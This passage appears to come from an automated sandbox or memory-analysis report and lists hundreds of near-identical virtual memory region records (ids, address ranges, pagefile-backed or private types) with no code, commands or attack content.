0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9239 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9240 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9241 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9242 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9243 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9244 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9245 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9246 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9247 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9248 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9249 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9250 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9251 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9252 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9253 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9254 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9255 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9256 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9257 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9258 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9259 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9260 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9261 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9262 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9263 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9264 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9265 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9266 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9267 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9268 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9269 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9270 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9271 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9272 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9273 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9274 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9275 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9276 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9277 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9278 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9279 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9280 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9281 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9282 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9283 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9284 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9383 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9384 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9385 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9386 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9387 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9388 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9389 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9390 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9391 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9392 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9393 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9394 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9395 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9396 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9397 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9398 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9399 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9400 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9401 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9402 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9403 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9404 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9405 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9406 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9407 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9408 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9409 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9410 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9411 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9412 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9413 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9414 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9416 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9417 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9418 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9419 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9420 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9421 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9422 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9423 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9424 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9425 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9426 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9427 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9428 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9429 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9430 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9431 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9432 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9433 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9434 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9435 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9466 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9467 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9468 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9469 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9470 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9471 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9472 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9473 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9474 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9475 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9476 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9477 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9478 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9479 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9480 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9481 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9482 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9483 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9484 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9485 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9486 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9487 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9488 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9489 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9490 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9491 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9492 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9493 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9494 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9500 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9501 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9502 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9503 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9504 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9505 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9506 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9507 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9508 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9509 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9510 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9511 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9512 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9513 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9514 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9515 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9516 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9517 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9518 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9519 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9520 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9521 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9522 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9523 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9524 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9590 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9591 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9592 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9593 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9594 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9595 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9596 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9597 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9598 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9599 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9600 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9601 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9602 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9603 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9604 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9605 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9606 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9607 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9608 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9609 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9610 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9611 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9612 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9613 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9614 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9615 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9616 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9617 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9618 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9619 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9620 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9621 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9622 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9623 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9624 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9625 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9626 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9627 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9628 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9629 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9630 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9631 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9632 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 